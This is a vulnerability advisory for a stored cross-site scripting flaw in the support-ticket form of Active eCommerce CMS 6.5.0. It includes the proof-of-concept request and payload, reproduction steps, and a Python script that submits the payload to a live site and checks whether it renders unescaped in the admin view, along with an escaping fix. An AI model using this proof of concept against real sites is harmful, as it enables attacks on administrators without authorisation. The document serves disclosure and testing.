| Title | Active eCommerce CMS 6.5.0 - Stored XSS |
|---|---|
| Submitter | skalvin (UID 49463) |
| Submitted | 25/06/2023 13:14 |
| Moderated | 04/07/2023 15:50 (9 days later) |
| Status | Accepted |
| VulDB entry | 232954 (Active It Zone Active eCommerce CMS 6.5.0 Create Ticket Page support_ticket details cross site scripting) |
| Points | 17 |

## Description

| Author | skalvin aka (CraCkEr) |
|---|---|
| Date | 25/06/2023 |
| Website | https://activeitzone.com/active-ecommerce-cms/ |
| Vendor | Active It Zone |
| Software | Active eCommerce CMS 6.5.0 |
| Vuln Type | Stored XSS |
| Impact | Manipulate the content of the site |

Release Notes:

Allows an attacker holding an ordinary customer account to inject malicious code into the website. Because the stored payload executes in the administrator's browser when the ticket is opened, it gives the attacker the ability to steal sensitive information, manipulate data, and launch additional attacks with the administrator's privileges.

## Stored XSS

The request below is the ticket-creation POST as captured on the test instance, which is installed under `/ecommerce/`; on a root install the path is `/support_ticket`. Only the relevant multipart field is shown.

```http
POST /ecommerce/support_ticket HTTP/2
Content-Disposition: form-data; name="details"

<script>alert(1)</script>
```

POST parameter `details` is vulnerable to stored XSS: the submitted value is stored as-is and later rendered unescaped in the admin ticket view, where the script executes.

## Steps to Reproduce:

1. Log in as a normal (non-admin) user.
2. Go to [Support Ticket] at https://website/support_ticket.
3. Click [Create a Ticket].
4. Put the XSS payload in the "Provide a detailed description" field.
5. Send the ticket.
6. The ADMIN visits [Support Desk] > [Ticket] in the administration panel at https://website/admin/support_ticket to check new tickets.
7. The ADMIN clicks the [Eye Icon] to view the ticket details and read the ticket.
8. The XSS fires and executes in the admin's browser.

[-] Done
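The steps above can be driven and checked without a browser. The script below is an added example, not the advisory author's code and not part of Active eCommerce CMS. It assumes things the page does not state: that the ticket form is sent as `multipart/form-data` with at least a `subject` and a `details` field (Laravel installs also expect a `_token` CSRF field), and that the admin ticket-view URL reached through the eye icon is supplied by the caller. The two admin-page fragments are constructed so the classification logic and the rendering-side fix can be exercised offline.

```python
"""Stored-XSS check for the Active eCommerce CMS support_ticket 'details' field.

Added example; not the advisory author's code and not part of the product.
Assumptions not on the page: the form is multipart/form-data with 'subject'
and 'details' (plus Laravel's '_token' CSRF field), and the admin ticket-view
URL (reached via the eye icon) is provided by the caller.
"""
import html
import uuid
import urllib.request
from typing import Dict, Optional, Tuple

PAYLOAD = "<script>alert(1)</script>"

# Constructed fragments standing in for the admin ticket view (offline use only).
VULNERABLE_VIEW = '<div class="ticket-details">' + PAYLOAD + "</div>"
FIXED_VIEW = '<div class="ticket-details">' + html.escape(PAYLOAD) + "</div>"


def build_multipart(fields: Dict[str, str], boundary: Optional[str] = None) -> Tuple[bytes, str]:
    """Encode form fields the way the PoC request sends them (multipart/form-data)."""
    boundary = boundary or uuid.uuid4().hex
    chunks = [
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
        f"{value}\r\n"
        for name, value in fields.items()
    ]
    body = ("".join(chunks) + f"--{boundary}--\r\n").encode("utf-8")
    return body, f"multipart/form-data; boundary={boundary}"


def classify_rendering(page: str, payload: str = PAYLOAD) -> str:
    """'unescaped' if the payload appears verbatim (XSS), 'escaped' if only its
    HTML-entity form is present (fixed), 'absent' otherwise."""
    if payload in page:
        return "unescaped"
    if html.escape(payload) in page:
        return "escaped"
    return "absent"


def render_details(details: str) -> str:
    """Rendering-side fix: HTML-escape the stored text before interpolating it
    (what Blade's {{ }} does via htmlspecialchars; {!! !!} would not)."""
    return '<div class="ticket-details">' + html.escape(details) + "</div>"


def submit_ticket(base_url: str, user_cookie: str, details: str,
                  subject: str = "test", csrf_token: Optional[str] = None) -> int:
    """Steps 1-5 of the advisory: create a ticket as a normal user (needs network)."""
    fields = {"subject": subject, "details": details}
    if csrf_token:
        fields["_token"] = csrf_token  # assumption: Laravel's CSRF field name
    body, ctype = build_multipart(fields)
    req = urllib.request.Request(base_url.rstrip("/") + "/support_ticket",
                                 data=body, method="POST")
    req.add_header("Content-Type", ctype)
    req.add_header("Cookie", user_cookie)
    with urllib.request.urlopen(req) as resp:
        return resp.status


def check_admin_view(admin_view_url: str, admin_cookie: str, payload: str = PAYLOAD) -> str:
    """Steps 6-8 without a browser: fetch the admin ticket view and classify it."""
    req = urllib.request.Request(admin_view_url)
    req.add_header("Cookie", admin_cookie)
    with urllib.request.urlopen(req) as resp:
        return classify_rendering(resp.read().decode("utf-8", "replace"), payload)


if __name__ == "__main__":
    # Offline demonstration on the constructed fragments.
    print("vulnerable view:", classify_rendering(VULNERABLE_VIEW))            # unescaped
    print("fixed view:     ", classify_rendering(FIXED_VIEW))                 # escaped
    print("render_details: ", classify_rendering(render_details(PAYLOAD)))    # escaped
```

When running this against a live instance, use a payload containing a per-run marker (for example a UUID inside the `alert` string) so that an older ticket from a previous test cannot produce a false "unescaped" result, and pass that same string as `payload` to `check_admin_view`.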